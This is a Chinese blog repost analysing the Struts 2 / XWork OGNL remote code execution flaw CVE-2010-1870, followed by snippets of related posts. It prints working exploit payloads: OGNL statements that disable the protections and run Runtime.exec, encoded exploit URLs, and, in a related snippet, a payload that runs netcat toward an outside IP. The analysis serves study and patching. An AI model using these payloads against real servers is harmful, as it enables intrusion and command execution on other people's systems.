Struts 2命令执行漏洞

最新推荐文章于 2026-06-19 13:56:40 发布
转载 最新推荐文章于 2026-06-19 13:56:40 发布 · 323 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
原文链接:http://www.cnblogs.com/marryZhan/archive/2012/06/29/2797288.html
标签
#java
2010年发现的Struts2框架中存在一个远程代码执行漏洞(CVE-2010-1870),此漏洞源于XWork组件的OGNL表达式处理不当,允许攻击者通过构造特定的HTTP请求参数绕过安全限制,执行任意代码。本文详细解析了漏洞原理及攻击payload构造方式。

2010年7月9日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。

这个漏洞的细节描述公布在exploit-db 上。

在这里简单摘述如下:

XWork通过getters/setters方法从HTTP的参数中获取对应action的名称,这个过程是基于OGNL(Object Graph Navigation Language)的。OGNL是怎么处理的呢?如下:

  1. user.address.city=Bishkek&user['favoriteDrink']=kumys 





会被转化成:

  1. action.getUser().getAddress().setCity("Bishkek")  
  2. action.getUser().setFavoriteDrink("kumys")  





这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的,它的参数是用户可控的,由HTTP参数传入。OGNL的功能较为强大,远程执行代码也正是利用了它的功能。

  1. * Method calling: foo()  
  2. * Static method calling: @java.lang.System@exit(1)  
  3. * Constructor calling: new MyClass()  
  4. * Ability to work with context variables: #foo = new MyClass()  
  5. * And more...  





由于参数完全是用户可控的,所以XWork出于安全的目的,增加了两个方法用以阻止代码执行。

  1. * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (缺省为true)  
  2. * SecurityMemberAccess private field called 'allowStaticMethodAccess' (缺省为false)  





但这两个方法可以被覆盖,从而导致代码执行。

  1. #_memberAccess['allowStaticMethodAccess'] = true  
  2. #foo = new java .lang.Boolean("false")  
  3. #context['xwork.MethodAccessor.denyMethodExecution'] = #foo  
  4. #rt = @java.lang.Runtime@getRuntime()  
  5. #rt.exec('mkdir /tmp/PWNED')  





ParametersInterceptor是不允许参数名称中有#的,因为OGNL中的许多预定义变量也是以#表示的。

  1. * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor. denyMethodExecution' property value.  
  2. * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.  
  3. * #root  
  4. * #this  
  5. * #_typeResolver  
  6. * #_classResolver  
  7. * #_traceEvaluations  
  8. * #_lastEvaluation  
  9. * #_keepLastEvaluation  





可是攻击者在过去找到了这样的方法(bug编号XW-641):使用\u0023来代替#,这是#的十六进制编码,从而构造出可以远程执行的攻击payload。

  1. http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den  
  2. yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti  
  3. me()))=1  





最终导致代码执行成功。



转载于:https://www.cnblogs.com/marryZhan/archive/2012/06/29/2797288.html

                

        




    





  



    

      

        

            

              
                
                  a65783305
                
              
            

            

                关注
              
            

        

        

          
      

      










              

                

              

            
              



	

		

			

				
					
XWork绕过安全限制执行任意命令漏洞补丁

				
			

			

				

					08-20
				

			

		

		

			
				
CVE ID: CVE-2010-1870

XWork是一个命令模式框架,用于支持Struts 2及其他应用。 

XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。

Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将:   

user.address.city=Bishkek&user['favoriteDrink']=kumys  

转换为:   

action.getUser().getAddress().setCity("Bishkek")  
action.getUser().setFavoriteDrink("kumys")  

这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。  

除了获取和设置属性外,OGNL还支持其他一些功能:  

     * 方法调用:foo()  
     * 静态方式调用: @java.lang.System@exit(1)  
     * 构建函数调用:new MyClass()  
     * 处理上下文变量:#foo = new MyClass()  

由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行:   

     * OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true)  
     * SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false)
   
为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量:  

     * #application  
     * #session  
     * #request  
     * #parameters  
     * #attr  
     * #context 
     * #_memberAccess 
     * #root  
     * #this  
     * #_typeResolver  
     * #_classResolver  
     * #_traceEvaluations  
     * #_lastEvaluation  
     * #_keepLastEvaluation  

这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:   

#_memberAccess['allowStaticMethodAccess'] = true  
#foo = new java .lang.Boolean("false")  
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo  
#rt = @java.lang.Runtime@getRuntime()  
#rt.exec('mkdir /tmp/PWNED')

			
		

	



              


  
              

                


	

		

			

				
					
Apache的Struts2框架严重安全漏洞

				
			

			

				

					07-20
				

			

		

		

			
				
Apache的Struts2框架最近出了一个很严重的漏洞,可以直接执行系统命令
http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22/usr/bin/nc%2067.205.52.169%208888%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1

			
		

	





	

		

			

				
					
Struts2漏洞分析之Ognl表达式特性引发的新思路

				
			

			

				

					HBohan的博客
				

				

					07-10
					
					891
					
				

			

		

		

			
				
摘要
在Ognl表达式中,会将被括号“()”包含的变量内容当做Ognl表达式执行。Ognl表达式的这一特性,引发出一种新的攻击思路。通过将恶意代码存储到变量中,然后在调用Ognl表达式的函数中使用这个变量来执行恶意的代码,从而实现攻击。
本文将会以CVE-2011-3923漏洞作为示例,描述这种利用思路的具体过程。但是,本文的内容绝不仅仅局限于这个漏洞,在实际的审计过程中,这种思路可以用来发现很多类似的漏洞。
背景介绍与原理分析
这个漏洞和CVE-2010-1870很相似,都是是通过Ognl表达式执行ja.

			
		

	



		

			
		



	

		

			

				
					
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)

				
			

			

				

					qq_51577576的博客
				

				

					10-14
					
					1583
					
				

			

		

		

			
				
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用

			
		

	





	

		

			

				
					
春秋云镜 CVE-2010-1870/CVE-2013-1965

				
			

			

				

					qq_22002773的博客
				

				

					09-18
					
					1512
					
				

			

		

		

			
				
春秋云镜 CVE-2010-1870/CVE-2013-1965

			
		

	





	

		

			

				
					
Struts2_005_RCE CVE-2010-1870漏洞复现

				
			

			

				

					ADummy的博客
				

				

					02-18
					
					2953
					
				

			

		

		

			
				
Struts2_005_远程代码执行
by ADummy
0x00利用路线
​			直接url执行payload,由于浏览器url输入框的长度有限,可以使用Hackbar插件,或burpsuite抓包测试。无回显。
0x01漏洞介绍
​			S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。S2-005则是绕过官方的安全配置(禁止静态方法

			
		

	





	

		

			

				
					
Struts2 S2-059漏洞复现-命令执行

				
			

			

				

					帅醉了的博客
				

				

					11-03
					
					2842
					
				

			

		

		

			
				
Struts2 S2-059漏洞复现-命令执行
http://192.168.202.133:8080/?id=1把id=改成%25%7B233*233%7D

验证完毕
测试命令执行



			
		

	





	

		

			

				
					
Struts2-016命令执行漏洞

				
			

			

				

					MX的博客
				

				

					05-05
					
					8177
					
				

			

		

		

			
				
Struts2-016命令执行漏洞
一:前言
CVE-2013-2251 漏洞概述:
Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,...

			
		

	





	

		

			

				
					
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)

				
			

			

				

					Lsec的博客
				

				

					03-12
					
					638
					
				

			

		

		

			
				
目录



DNSLog验证漏洞

通过构造POST包去执行命令

执行反弹SHELL命令

DNSLog验证漏洞

DNSLog地址:http://dnslog.cn/


POST /index.action HTTP/1.1
Host: 192.168.1.131:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,appli.

			
		

	





	

		

			

				
					
Struts2 S2-045漏洞深度剖析:从OGNL注入到远程命令执行实战

					
最新发布

				
			

			

				

					weixin_32736961的博客
				

				

					06-19
					
					302
					
				

			

		

		

			
				
远程命令执行(RCE)是Web安全领域的高危漏洞类型,它允许攻击者在目标服务器上执行任意系统命令,从而完全控制系统。其原理通常源于应用程序对用户输入的处理不当,将未经验证或过滤的数据传递给可执行代码的上下文,例如系统调用接口或表达式引擎。这类漏洞的技术价值在于其直接威胁服务器安全,可导致数据泄露、服务中断乃至成为内网渗透的跳板,常见于文件上传、反序列化、模板注入等场景。本文聚焦于经典案例——Struts2框架的S2-045漏洞,它正是由于框架在处理HTTP请求时,错误地将用户可控的Content-Type头

			
		

	





	

		

			

				
					
Struts2远程命令执行漏洞

					
热门推荐

				
			

			

				

					mirror97black的博客
				

				

					12-20
					
					1万+
					
				

			

		

		

			
				
Struts2 远程命令执行漏洞

			
		

	





	

		

			

				
					
Struts 2.0.0 至 2.1.8.1 远程命令执行漏洞(CVE-2010-1870)

				
			

			

				

					Flag少侠的博客
				

				

					07-11
					
					9406
					
				

			

		

		

			
				
打开靶场靶场页面有一个选择语言的功能打开 BurpSuite 开启数据包拦截抓包修改请求体为 POST,并构造恶意的 payload分步解析开头的会告诉Struts2框架将用户重定向到构造的URL。但在这里我们主要利用它的表达式注入能力。${...}${...}表示一个OGNL表达式,Struts2会解释和执行这个表达式。#req这部分获取当前的HTTP请求对象。使用字符串拼接来绕过某些安全过滤器。#s这里我们使用来执行系统命令。在这个例子中,执行的命令是。读取命令输出。#str。

			
		

	





	

		

			

				
					
struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

				
			

			

				

					weixin_33861800的博客
				

				

					06-29
					
					382
					
				

			

		

		

			
				
catalog

1. Description
2. Effected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix

 
1. Description
struts2漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为...

			
		

	





	

		

			

				
					
Struts2安全漏洞(转载绿盟)

				
			

			

				

					iteye_18492的博客
				

				

					07-19
					
					317
					
				

			

		

		

			
				
XWork ParameterInterceptor类绕过安全限制漏洞
受影响系统:
OpenSymphony XWork < 2.2.0Apache Group Struts < 2.2.0
描述:

CVE ID: CVE-2010-1870XWork是一个命令模式框架,用于支持Struts 2及其他应用。 Struts2中WebWork框架使用XWork基于HTTP参数名...

			
		

	





	

		

			

				
					
CVE-2010-1870-春秋云镜

				
			

			

				

					weixin_49064458的博客
				

				

					06-26
					
					1192
					
				

			

		

		

			
				
CVE-2010-1870 (Struts2 S2-005) 漏洞分析 Apache Struts2 S2-005是一个经典的OGNL表达式注入漏洞,允许攻击者远程执行任意代码。该漏洞源于Struts2对传入参数中的OGNL表达式处理不当,攻击者可利用特殊字符绕过黑名单限制,通过构造恶意参数执行Java方法。 漏洞利用条件包括:Struts2开启OGNL动态访问、无安全过滤或过滤被绕过、可控参数名和值。典型的利用方式是通过URL参数注入OGNL表达式,修改安全配置并执行系统命令。

			
		

	





	

		

			

				
					
S2-005远程代码执行(CVE-2010-1870)

				
			

			

				

					m0_65150886的博客
				

				

					01-15
					
					751
					
				

			

		

		

			
				
虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。OGNL表达式通过#来访问struts的对象,Struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开,S2-003的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上。

			
		

	





	

		

			

				
					
Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补

				
			

			

				

					JAVA
				

				

					07-27
					
					382
					
				

			

		

		

			
				

1.exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞,此漏洞危害之大,可谓百发百中,直接root,只要采用了Struts2和webwork框架的系统(对于webwork的版本,不太清楚,我这里没环境对其一一测试,这里有两者关系的介绍),基本上无一幸免。
2.昨天在接到朋友的提醒后,迅速将公司的一些使用此框架开发的项目漏洞修补了,我想大部分大公司的也在第一时...

			
		

	





	

		

			

				
					
S2-005-RCE(CVE-2010-1870)--vulhub

				
			

			

				

					ccc_9wy的博客
				

				

					12-28
					
					347
					
				

			

		

		

			
				
struts2漏洞复现;S-005;RCE漏洞;CVE-2010-1870;OGNL表达式。

			
		

	





	

		

			

				
					
struts2漏洞集合

				
			

			

				

					angaoux03775的博客
				

				

					10-27
					
					2825
					
				

			

		

		

			
				
[+]1 S2-005  CVE-2010-1870CVE-2010-1870  影响版本:Struts 2.0.0 – Struts 2.1.8.1   官方公告:http://struts.apache.org/release/2.2.x/docs/s2-005.html

('\43_memberAccess.allowStaticMethodAccess')(a)=true...

			
		

	



              




          





        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值